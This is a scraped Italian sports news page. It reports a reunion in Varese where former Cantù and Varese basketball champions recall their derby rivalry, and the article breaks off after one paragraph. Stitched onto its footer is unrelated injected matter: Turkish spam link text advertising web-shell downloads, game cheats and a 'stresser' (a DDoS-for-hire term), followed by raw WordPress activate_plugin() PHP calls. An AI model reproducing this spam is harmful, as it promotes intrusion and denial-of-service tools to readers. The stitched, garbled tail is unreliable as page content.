Cantù-Varese, tra Forst e Ignis derby senza tempo: “Rivalità e amicizia”


Da Meneghin a Recalcati e Riva, i campioni del passato di Cantù e Varese riuniti da Ambrosetti: “Agonismo e rispetto”

dal nostro inviato Andrea Tosi

18 ottobre
– varese

Il derby Varese-Cantù, una delle grandi classiche dei canestri italiani, ritorna una settimana dopo quello vinto dalla squadra brianzola a Masnago. Non è una rivincita sul campo ma un bel amarcord degli anni 60-80 che sei campioni di quell’epoca rievocano sul palco del teatro delle Ville Ponti, storica location di Varese, all’interno dell’evento “I campionissimi” che anche quest’anno, superando i problemi del Covid, con grande tenacia ha organizzato Alfredo Ambrosetti, anfitrione senza pari, imprenditore che ama omaggiare i campioni dello sport con annuali incontri e testimonianze.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun Hileleri Oyun Hileleri Stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );